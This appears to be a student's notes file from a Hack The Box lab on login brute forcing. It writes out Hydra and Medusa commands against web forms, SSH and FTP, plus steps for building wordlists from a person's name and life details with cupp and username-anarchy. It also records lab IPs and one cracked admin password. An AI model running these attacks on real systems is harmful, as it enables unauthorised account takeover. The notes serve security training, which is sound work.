dkelly/md_notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
bf917d40af478db54d5350c1832d3283a020f245
md_notes/htb_login_brute_forcing.md
Donovan bf917d40af inital commit
2024-11-19 12:05:57 -06:00

75 lines
2.4 KiB
Markdown
Raw Blame History

# HTB Login Brute Forcing
## Login Forms
### Hydra
hydra basic auth
hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81
can use hydra to crack passcodes in the login:
djelly@htb[/htb]$ hydra [options] target http-post-form "path:params:condition_string"
I can look for a fail condition like:
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
Or a success conditions:
- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # looking for a redirect
- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" # looking for "Dashboard"
### Exercise
curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f {Replace with ip} -s {replace with port} http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.251.254 -s 34996 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
## Medusa
medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh
medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
medusa -h 94.237.59.119 -n 39693 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
## Custom Wordlists
create likely usernames from a persons name:
git clone https://github.com/urbanadventurer/username-anarchy.git
./username-anarchy Jane Smith > jane_smith_usernames.txt
`cupp -i`
cupp in interactive mode will create lots of passwords from a persons life.
hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
:
hydra -L jane_smith_usernames.txt -P jane-filtered.txt 94.237.60.154 -s 46018 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
## Skill assessment1
:56383
hydra -L usernames.txt -P passwords.txt 94.237.50.94 http-get / -s 56383
[56383][http-get] host: 94.237.50.94 login: admin password: Admin123
## Skill assess2
83.136.250.158:39972
hydra -L usernames.txt -P passwords.txt -s 38376 -V 94.237.50.94 ftp
hydra -l satwossh -P passwords.txt -s 39972 -V 83.136.250.158 ssh -t 4
medusa -M ssh -h 83.136.250.158 -u root -P passwords.txt -n 39972 -t 4
Reference in New Issue View Git Blame Copy Permalink